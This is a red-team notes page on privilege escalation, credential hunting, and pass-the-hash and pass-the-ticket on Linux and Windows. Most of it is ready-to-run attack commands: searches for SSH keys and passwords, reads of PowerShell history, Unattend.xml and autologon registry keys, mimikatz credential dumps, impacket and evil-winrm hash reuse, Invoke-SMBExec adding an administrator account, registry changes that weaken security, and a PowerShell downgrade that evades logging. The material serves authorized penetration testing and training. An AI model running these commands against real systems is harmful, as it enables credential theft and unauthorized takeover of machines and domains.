Red Team - Fourth step - Privilege Escalation

Privilege Escalation 🔑 is the fourth step of the pentester activities. We attempt to escalate from a regular user to an administrative account by exploiting a vulnerability in the system.

This is an important step otherwise we may not have enough privilege to access data, leave a backdoor, or for most post-exploitation tasks.

We want to access account with the higher level of privileges:

root > sudoers > [...] on Linux
NT AUTHORITY\SYSTEM > Administrator > [...] on Windows

Escalation can be horizontally/laterally (another user with the same level of privileges) and vertically (a higher level of privileges).

Learn 🎓

Ignitetechnologies/Privilege-Escalation (3.3k ⭐, CTFs)

Tools

Meterpreter (scripts for Linux/Windows)

Privilege Escalation Basics

Each operating system has its own set of escalation vectors while they share similarities. The most common point is that we want to gather information about the environnement.

User information 🧑: it may be used to determine your level of access, your role, along with username naming conventions
Host information 💻: it may be used to find if there are well-known vulnerabilities or misconfigurations.
Network information 🌍: from the outside, we mostly only saw a portion of the internal network. We find find that the host is running a FTP server only available from the inside. It's also interesting to see the ARP cache and the routing tables.

Additionally, look for folders where you can download and run scripts, along with the machine configuration to configure them properly.

I compiled a list of handy commands per operating system:

You will also have to look for installed tools and apps along with their versions. You will need this information to look for CVEs and exploits related to local escalation privilege.

Linux privilege escalation 🦆

Linux privilege escalation may be achieved by exploiting:

💎 Exploiting sudo
⏰ Exploiting scheduled tasks (cron tasks)
🔑 Finding credentials/files (config, logs, ssh keys...)
💥 Exploiting the kernel
🐸 Misconfigured file permissions (SUID, capabilities, groups)
📦 Look for unmounted drives/medias
🪦 Look for vulnerable applications
👻 Look for printers (lpstat)

External tools/services

🎠 Misconfigured NFS shares
🎠 Misconfigured Docker socket/permissions
🎠 Misconfigured LXC/LXD permissions
🎠 Misconfigured Tmux sessions

⚠️ Don't forget hidden files. Compiled Recipe.

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

linPEAS (15.9k ⭐ | shell script)
LinEnum (7.0k ⭐ | shell script | 2020 🪦)
traitor (6.5k ⭐ | go script compiled to binary | 2022 ☠️)
linux-smart-enumeration a.k.a. LSE (3.0k ⭐ | shell script)
linuxprivchecker (1.6k ⭐ | python script, 2021 🪦)
pwncat-cs (2.3k ⭐ | reverse shell with priv. esc. suggester | 2022 ☠️)

Additional references

Special escalation vectors

The SSH banner (/etc/update-motd.d/00-header), which is executed as root, is using a script that we could edit.

Windows privilege escalation 🪟

Windows privilege escalation may be achieved by exploiting:

💎 Exploiting UAC
⏰ Exploiting scheduled tasks
🔑 Finding credentials (config, logs, passwords...)
💥 Exploiting services and named pipes
🐸 Exploiting privileges (including groups and ACEs)
📦 Unpatched vulnerabilities

Additional references

LOLBAS (6.3k ⭐)
hijacklibs (0.5k ⭐)
frizb (0.8k ⭐, checklist, 2020 🪦)
Ghostpack-CompiledBinaries (1.2k ⭐, 2022 🪦)
SharpCollection (2.3k ⭐, compiled C# projects)
Creds (1.1k ⭐, Windows Pentest Kit)
m0chan 2019 checklist

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

WinPeas (15.9k ⭐ | binary | Download and Run .\winPEASany_ofs.exe)
Seatbelt (3.7k ⭐)
PrivescCheck (2.9k ⭐ | powershell script)
JAWS (1.7k ⭐ | 2020 🪦)
SharpUp (1.2k ⭐ | C# port of PowerUp)
PowerSploit (11.2k ⭐ | powershell script | 2017 🪦 | This is the latest version of PowerTools and PowerUp which are dead too since 2014/2015).

PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
PS> powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

Credential Hunting

You may try to look for credentials. Try password/key reuse.

🔑 Password, Passphrases
🎫 Tickets (ex: Kerberos), Tokens (ex: GIT), Keys (ex: SSH)

Common places to dig for credentials are:

🔐 command history (ex: ~/.bash_history, *hist*)
🌍 browser history, saved passwords, etc.
🛣️ application (.ppk, .rdp, .sdtid) and system logs (/var/log/)
🐚 backups (.old, .bak, xxx~...)
✉️ conversations/mails (/var/mail/)
🌳 configurations (.env, .ini/.config/.cfg/.conf/.cnf, .sql)
🤖 scripts and tasks (.sh/.ps1/.bat, cronjob)
👜 check the registry (Windows, privilege required)
💎 Databases (.*db*), Password Managers, Files
...

Manually dig for interesting or unexpected files

/: look for unexpected folders in /
/root/: test if administrator home is readable
~/Desktop: look for documents, passwords...
~/Documents: look for documents, passwords...
%appdata%: look for sensitive applications data

Always put yourself in the target shoes.

Automated Tools To Find Credentials

You can use LaZagne (9.5k ⭐).

PS> wget IP:port/LaZagne.exe -UseBasicParsing -O LaZagne.exe
PS> .\LaZagne.exe all

You can use Snaffler (2.0k ⭐) to find juicy files on your host and every available share on the network.

PS> Snaffler.exe -s -d domain -o snaffler.log -v data
<#press enter multiples times if stdout stuck#>

You can use SessionGopher (1.2k ⭐, 2018 🪦).

PS> Import-Module .\SessionGopher.ps1

You can use MailSniper (2.9k ⭐, 2022 🪦) for automated scans of sensitive information in a Microsoft Exchange environment.

You can use truffleHog (16.0k ⭐) for GIT repositories.

Linux CredHunting Notes

You often find interesting files in easy CTFs using:

$ find / -user $(whoami) -type f 2>/dev/null | grep -v /proc | grep -v /sys
$ find / -type f -writable 2>/dev/null | grep -v /proc | grep -v /sys

Find credentials, keys, tokens, passwords:

$ find / -name .ssh 2> /dev/null
$ find / -name *id_rsa* 2> /dev/null
$ grep -rnw "PRIVATE KEY" / 2>/dev/null | grep ":1" # private keys
$ grep -rnw "ssh-rsa" / 2>/dev/null | grep ":1"     # public keys
$ find / -wholename "*.git/config" 2> /dev/null | xargs grep "url"

Look for web application sessions (+ in database):

$ cat /etc/php/X.X/cli/php.ini | grep 'session.save_path'
$ cat /etc/php/X.X/apache2/php.ini | grep 'session.save_path'
$ find / -name "SESSIONS.ser" 2> /dev/null

🔐 As root, check Linux password history file: /etc/security/opasswd.

Windows CredHunting Notes

Read PowerShell console history:

PS> gc (Get-PSReadLineOption).HistorySavePath
PS> type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
CMD> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

List saved credentials by Windows:

PS> cmdkey /list
PS> # use 'admin' saved credentials to start cmd.exe
PS> runas /savecred /user:admin cmd.exe
PS> runas /savecred /user:admin "COMMAND HERE"

Some known locations:

# Internet Information Services (IIS) = the default web server
PS> type C:\inetpub\wwwroot\web.config | findstr connectionString
PS> type C:\Windows\Microsoft.NET\Framework64\vX.X.XXXXX\Config\web.config | findstr connectionString
# Windows Deployment Services (credentials of the admin that
# deployed the OS image to several hosts, referred as "Unattended")
PS> type C:\Unattend.xml
PS> type C:\Windows\Panther\Unattend.xml
PS> type C:\Windows\Panther\Unattend\Unattend.xml
PS> type C:\Windows\system32\sysprep.inf
PS> type C:\Windows\system32\sysprep\sysprep.xml
# VNC servers
# FileZilla
PS> type C:\xampp\FileZilla Server\FileZilla Server.xml
PS> type C:\Program Files\FileZilla Server\FileZilla Server.xml

Some known registry keys/hives:

# Putty
PS> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS> reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
# Windows Autologon - Cleartext credentials
PS> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Visualize saved WI-FI network passwords:

PS> netsh wlan show profile
PS> netsh wlan show profile <profile_name> key=clear

Some users may store sensitive data in sticky notes database:

PS> ls $Env:localappdata/Packages/Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe/LocalState/plum.sqlite

Manually look for sensitive files:

CMD> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
CMD> where /R C:\ *.txt *.ini *.cfg *.config *.xml
CMD> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
PS> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Refer to these notes for SAM, LSA, Credential Manager and tickets:

mimikatz# vault::list
mimikatz# vault::cred
mimikatz# lsadump::lsa /patch
mimikatz# sekurlsa::dpapi
mimikatz# sekurlsa::logonpasswords
mimikatz# kerberos::list

Dig centrally deployed application:

McAfee Credentials

📚 See also: PowerShell Secure String for encrypted passwords.

📚 Remember to look inside network shares too including SYSVOL. Password may be stored in the user description too.

PS> Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} # PowerView

Pass-the-xxx

Pass-the-hash (pth)

There are some scenarios in which we got hold of a hash, but haven't managed to crack it. We may try to use the hash.

Legacy systems using NTLM instead of Kerberos (or alternatives) may be vulnerable as hashes are not salted and may be reused.

⚠️ When an administrator remotely access a host, the loose their privileges. If FilterAdministratorToken is disabled, setting to 1: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy will disable this security.

⚠️ Remote RDP Pass-The-Hash is not possible by default. You need to disable DisableRestrictedAdmin. For instance, using the command: reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f (registry permission required).

Protocol-specific tools (examples)

$ evil-winrm -i IP -u username -H "nthash" # WinRM protocol
$ nxc smb IP/32 -u username -d . -H nthash
$ xfreerdp  /v:IP /u:username /pth:nthash
$ remmina # create a config and scroll down to "hash"
$ impacket-psexec -hashes :nthash username@IP
$ impacket-secretsdump -just-dc-user example/administrator username@IP -hashes lmhash:nthash

We can use the popular Mimikatz tool on Windows.

mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:example.com /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:example.com /run:cmd.exe

We can use the Invoke-TheHash (1.5k ⭐, 2018 🪦) script suite on Windows. We can use it to create a user on the target, if we have admin access onto the target. Otherwise, pop a reverse shell.

PS> Import-Module .\Invoke-TheHash.psd1
PS> Invoke-SMBExec -Target IP -Domain xxx -Username xxx -Hash xxx -Command "net user xxx Password123 /add && net localgroup administrators xxx /add" -Verbose
PS> Invoke-WMIExec -Target DC01 -Domain xxx.xxx -Username xxx -Hash xxx -Command "cmd.exe"

Pass-the-ticket (ptt)

Some authentication mechanisms such as Kerberos are based on tickets to authorize access to resources. Given a ticket that hasn't expired, we may be able to access interesting resources.

On Windows, an user can only access their tickets, while an admin can access every ticket on the computer.

We can use the popular Mimikatz tool on Windows.

mimikatz# kerberos::ptt ".\xxx@yyy.kirbi" # load ticket

We can use Rubeus

PS> # Load the ticket in the current session
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>

On Linux, refer to this to load and use the ticket.

What's next? 🐼 According to the ticket that was loaded, you may be able to run commands that you couldn't before. For instance:

PS> dir \\DC01.example.com\c$
PS> dir \\DC01.example.com\some_user_share
PS> dir \\DC01\some_user_share
PS> Enter-PSSession -ComputerName DC01

👻 To-do 👻

Stuff that I found, but never read/used yet.

Courses

Cheatsheet

Random

WADComs (1k ⭐)/wadcoms website
Metasploit PRO
Create custom modules, -m or loadpath to load them, doc
Test cracked credentials on any user

XXX

If AppLocker is in use, try alternative paths or alternative executables such as PowerShell_ISE.exe for powershell
Powershell downgrade attack (powershell.exe -version 2 ; Get-host) if multiple versions are present. Powershell V2 doesn't support event logging.

Exploiting Services

Red Team - Fourth step - Privilege Escalation ¶

Privilege Escalation Basics ¶

Linux privilege escalation 🦆 ¶

Windows privilege escalation 🪟 ¶

Credential Hunting ¶

Automated Tools To Find Credentials ¶

Linux CredHunting Notes ¶

Windows CredHunting Notes ¶

Pass-the-xxx ¶

Pass-the-hash (pth) ¶

Pass-the-ticket (ptt) ¶

👻 To-do 👻 ¶